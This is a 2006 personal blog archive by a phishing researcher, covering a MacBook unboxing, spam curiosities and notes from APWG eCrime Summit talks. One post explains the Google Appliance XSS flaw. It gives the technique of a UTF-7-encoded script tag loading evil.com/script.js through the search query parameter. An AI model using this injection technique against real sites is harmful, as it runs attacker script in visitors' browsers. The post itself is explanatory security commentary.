Thursday, November 30, 2006

new toy

On the 27th I ordered a new toy from Apple, well, okay, it's a computer so thus a tool for my research. I figured since I was buying a new laptop, I should go all out and get dongles for it too; it's important to be able to hook it to a monitor, projector or TV, so I bought an S-Video, a DVI, and a VGA dongle to plug into it. Funny thing, they arrived two days ago.

So needless to say, last night I was anxious for it to show up. FedEx was shipping it from China, and I had been following it on its travel through Alaska. When I went to bed, it was still en route from Alaska. FedEx woke me up at 8:30 by pounding the hell out of my door, and there it was! Incredibly fast. Go FedEx.

Anyhow, I'm as always infatuated with Apple's packages, so I slowly opened the sucker marveling at how they used a thick shipping box with only corner foam pieces to kind of minimize waste. (They have been getting lots of flack recently about being harmful to Ms. Earth.) Anyhow, inside the brown box was a really pretty marketing box that mostly shows off their presentation abilities.

Tearing through the tape, I pulled all the stuff out of the box noticing a new flavor of foam: it looked waffley. Stamped on the foam too was the MacBook logo. I still think it's odd that Apple goes through the trouble to make things so pretty when people will only see them once. Maybe it's for geeks like me who enjoy opening boxes way too much.

Box drooling aside (not quite as cool as the original cube iPod boxes), I pulled out my new workhorse and opened it up. I really like this new magnetic latch. One of my peeves about the 12" PowerBook is the flimsy latch.

Of course the best thing about the way Apple ships their laptops is the full battery. I've never seen instructions packaged with any battery-powered Apple product that says "plug in for charging before first use" or even "go buy a battery." They take good care of their customers -- cell phone manufacturers could take a hint from them.

Anyway, all things in order, I've set up the new MacBook just the way I want it, and am constantly being impressed by little things. For example:

  • During initial setup, you pick an image to represent your account. The software turned on the built-in iSight camera and let me take a photo of me (bed head and all)!

  • Emacs compiled in 10 minutes (took over an hour on my old PowerBook).

  • Target Disk mode rocks! I used my old laptop as an external FireWire hard disk to transfer all my documents and settings. Couldn't have been easier.

  • Third-Party software, including games, were pre-installed. This included a Mancala game. I didn't know Mancala was even popular.



There's lots of software that looks fun, including ComicLife... maybe I'll post a comic strip later.

spammers concerned with fraud

It appears that some spammers are concerned with phishing and pharming attacks that will make it harder for people to find the real source of Viagra. To fight this, some spammers are telling people to actually type the url into the browser, and not follow links in the email.

Honestly! You're at the bottom of the authority chain, you're a spammer. Just use a link.

(Link to a screengrab of the email)

Wednesday, November 29, 2006

google appliance xss

Multiple sources have been reporting a Google Appliance XSS attack. In short, the attack allows someone to tweak the variables sent to a search page in a way that lets arbitrary scripts from any domain to be executed on the results page.

Say I do a search at IU's search page, and when the results are shown to me I am directed to this url:
http://search.iu.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8&...

I can change the q and oe variables such that the q variable has <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so the q variable is decoded. Then when the results are shown, evil.com/script.js is loaded on the page.

This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.

I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some javascript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?

Monday, November 20, 2006

powered by the Microsoft

I got an interesting spam today that said I won the Microsoft Lottery (the UK Microsoft Lottery). It was your usual email, except I'm sure it's performance was much better; there was a tag at the bottom that said:
this is powered by the Microsoft®

Friday, November 17, 2006

apwg: day 2, law and enforcement

Today was mostly geared towards law enforcement and legal arguments about how and why phishing (and other electronic fraud) are difficult to catch.


Stanley W. Crowder (Special Agent, US Secret Service)
Mr. Crowder talked about how the USSS investigates phishing to help find people, stop them, and generally protect consumers.   He mentioned that there are lots of carding websites used for fraud.  Also, there is a tremendous underground culture (or market) centered around stealing and using identity for financial gain.  Take-Home message: Law enforcement needs help breaking through the technological barriers to catch bad guys.

Michael Levin (Dep. Dir. National Cyber Security Division, DHS)
Agent Levin gave a little insight about how his division at the DHS operates.  It appeared to me that his emphasis was on DHS's main aim is to get different communities talking to each other (intelligence, academia, law enforcement).  He believes all police should be equally well trained on cybercrime so they can help collect and identify digital evidence when they visit a crime scene.  He also believes in establishing good relations between US feds and other countries' federal cops by "drinkin' beer or drinkin' vodka or wrestlin' with 'em" -- whatever it takes.

DHS interacts with the public via CyberCop.  You can register for the CyberCop portal and obtain a weekly newsletter called "unusual suspects" sharing some sort of interesting information (don't know what).

odd spam



Today I got spam consisting of a lot of random numbers chosen and formatted to spell out a domain name. Click the above picture to see the whole email. Kind of weird. Anyone else seen anything like this?

Update (17-Nov 12:17): It appears to be a very cryptic pump and dump scam. See the stock ticker on yahoo.

Thursday, November 16, 2006

apwg: Sven Karge

Sven Karge talked about legal implications of phishing in Germany.  There were lots of subjective details, but in short, be really really careful if you fly through Germany after doing anti-phishing studies where you simulate sending phishy emails.  There are lots of issues with copyright infringement, though the laws he presented seemed pretty fair -- criminal intent is important to prosecute.  He also suggested ways to improve tracking and shut-down of international phishing operations:
"To prosecute, we need good international cooperation."
This includes well-established and court-approved evidence sharing procedures so we can prosecute phishers in international courts.

apwg: John Brozycki

Representing an "anonymous" financial institution, John Brozycki  talked about how Phish Feeding works.  You automate attacking phishing sites by feeding in bad data.  The bad data then comes through to your site when the phisher attempts to use it.  You can watch the phish food turn into phish poo (not an official term) and track their behaviors.  Additionally, you can flood a phisher's site with so much bad data that they get pissed off and stop bothering you.

Phishers respond to this by implementing captchas (Turing Tests).  Unfortuantely, most use bad captchas, so scripts still work to infuse bad data.  Another thing he brought up was that phishers can block traffic from certain areas (i.e. the institution they are spoofing).  You can get around that by purchasing DSL connections.

More information at TrueInsecurity.com, email phishfeeder at that domain for info about phish feeding.

apwg: Brad Keller

An opening talk was presented by Brad Keller, the eCommerce Business Risk Manager of Wachovia.  He made some good points about internet fraud.

He claims we need to use multiple approaches
and multiple tools to make phishing and other electronic fraud unprofitable.  This point was followed up with the claim we need to shift the focus from "identifying a provider's site to clients" to "identifying the clients to a provider".  It may be a better solution to make sure clients are valid instead of trying to prevent theft of their identity.

Mr. Keller also emphasized that much of the fraud his institution sees is not direct fraud: not just phishing, then using the data.  Keyloggers and other crimeware capture various credentials, which are then circulated on the black market.

A wealth of information can be extracted from a client's transaction and browsing habits, as well as from their IP and computer information.  This can be used to help profile people and identify anomolies (such as transactions that are minutes apart, but on different continents).

All in all, he has been frequently surprised by what phishers seem to do --- it's possible that phishers don't clear cookies, suggesting it may be time to start profiling phishers themselves, instead of just relying on profiling of their sites and emails.

Things to research: Smishing, Phish Phood (not ice cream), Client Metrics, Access Anomaly Detection

APWG eCrime Summit

I'm in Orlando at the APWG eCrime Summit and enjoying the opening session.

I'll be posting a bit of information about some of the talks throughout today and tomorrow.

Saturday, November 11, 2006

pirate spam

I got an email today with a subject "Nicholas has uploaded new software for you". The link provided is one to a "deep discounts" software site where you can buy $9000 software for $150. What interested me was the extra content in the mail to get past spam filters.


perform the following steps:
To fix this problem, you can have the text filter send a FORM
#
2. Members of the FreeBSD group who are active testers, willing to
aptly named kernel. You should always use kernel for
probable location of the failing piece of code (e.g., the pcvt driver
language-based printers) which cannot directly print plain text.
below the soft limit, the grace period will be reset.
to be transmitted and expected.
old trusty config file after upgrading from a pre-FreeBSD2.0.5.R
a page, specify them with the ff capability in /etc/printcap.
login
Bring a printer up; the opposite of the down command.
text filter for a printer, it sets the filter's standard input to the
does not start somewhere on the middle of the last page of the
Floppy drive controller: fd0 is the ``A:'' floppy drive, and fd1
printf "\033&k2G" || exit 2
regular kill instead



And it goes on. Some of my favorite quotes from the message are:


"give them the 'machine ID' and they will respond with a corresponding rose: Permission denied"

"touch your tree."

"Print jobs who wish to make topical suggestions on changes and the general (horizontal, vertical). So, first think, then format. The format controller! In general, every reconfiguration of a SCSI bus must pay"

Wednesday, November 01, 2006

ids daily header

Today is a double-hit day for me in the Indiana Daily Student.

'Bug' in new UITS Webmail filter causes some to miss e-mails

Student's Web site receives national attention


Yesterday was a double-hit day for Chris. Two articles right next to each other on the front page.

FBI raids Ph.D. student's apartment, investigates Web site

Project might be linked to graduate research at IU

The two hits for Chris are just in the sea of articles that have been printed since the Associated Press picked up on it.